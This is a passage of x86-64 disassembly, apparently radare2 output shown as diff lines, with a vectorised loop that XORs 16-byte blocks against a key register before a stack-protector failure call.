- │ |||││ 0x100002746 660f6f4af0 movdqa xmm1, xmmword [rdx - 0x10]
- │ |||││ 0x10000274b 660fefc8 pxor xmm1, xmm0
- │ |||││ 0x10000274f 660f6f12 movdqa xmm2, xmmword [rdx]
- │ |||││ 0x100002753 660fefd0 pxor xmm2, xmm0
- │ |||││ 0x100002757 660f7f4af0 movdqa xmmword [rdx - 0x10], xmm1
- │ |||││ 0x10000275c 660f7f12 movdqa xmmword [rdx], xmm2
- │ |||││ 0x100002760 4883c240 add rdx, 0x40 ; '@'
- │ |||││ 0x100002764 4883c1f8 add rcx, 0xfffffffffffffff8
- │ └─────< 0x100002768 75c0 jne 0x10000272a
- │ ||│└─> 0x10000276a 4839c3 cmp rbx, rax
- │ |└───< 0x10000276d 0f855dffffff jne 0x1000026d0
- │ └────< 0x100002773 e972ffffff jmp 0x1000026ea
- └ └──> 0x100002778 e8af000000 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)